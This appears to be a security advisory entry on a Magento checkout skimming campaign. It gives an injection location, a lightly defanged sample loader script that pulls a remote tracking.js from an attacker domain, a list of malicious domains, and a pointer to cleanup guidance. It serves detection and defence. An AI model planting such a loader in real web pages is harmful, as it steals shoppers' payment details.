Description: Injection of malicious scripts into Magneto checkout pages. The scripts steal entered payment details and send them to remote third-party sites.
The scripts are typically injected into the core_config_data table
Sample:
<scri pt type="text/javascript">var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src = 'controlmage[.]com/e/tracking.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);</script>
Domain involed: apissystem[.]com, codesmagento[.]com, controlmage[.]com, cdnppay[.]com, resselerratings[.]com, cdngoogle[.]com, apismanagers[.]com, verpayments[.]com, myageverify[.]com, assetsbraln[.]com, verpayment[.]com, magesources[.]com,traskedlink[.]com, magejavascripts[.]com, mjs24[.]com, m24js[.]com, cdnassels[.]com, magescripts[.]pw and jscriptscloud[.]com
For additional details check the Ecommerce security category of our blog.
Affecting: Magento
Mitigation How to clean a hacked Magento site